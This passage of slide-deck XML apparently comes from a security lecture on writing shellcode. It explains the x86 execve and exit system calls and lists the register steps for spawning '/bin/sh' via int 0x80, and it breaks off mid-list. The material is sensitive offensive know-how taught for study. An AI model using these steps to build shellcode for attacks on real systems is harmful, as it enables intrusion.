                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>0xb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>(index in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the program name in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”, NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>(e.g., NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>0x80 (note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> is the more optimized way to invoke system calls)   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36821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8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8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8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8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8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8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a:t>System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> status)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Exit code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207313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8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8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8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8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4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539655" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the null-terminated string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory (filename parameter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" somewhere in memory followed by a NULL pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have the address of a NULL long word somewhere in memory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209437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96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96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96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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Invoking the System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540677" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0xb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the string "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy the address of the address of "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the address of the null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0x0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
